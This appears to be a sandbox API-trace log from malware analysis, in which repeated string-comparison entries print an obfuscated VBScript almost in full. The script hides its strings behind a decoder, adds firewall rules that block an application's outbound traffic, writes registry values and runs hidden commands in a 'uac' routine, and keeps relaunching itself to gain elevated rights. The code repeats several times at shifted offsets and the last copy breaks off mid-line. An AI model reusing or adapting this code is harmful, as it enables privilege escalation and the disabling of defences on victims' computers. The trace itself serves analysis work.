bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 87 [0222.973] wcsncmp (_String1=" Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0222.973] wcsncmp (_String1="Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 57 [0222.973] wcsncmp (_String1="unction\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 104 [0222.973] wcsncmp (_String1="nction\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite 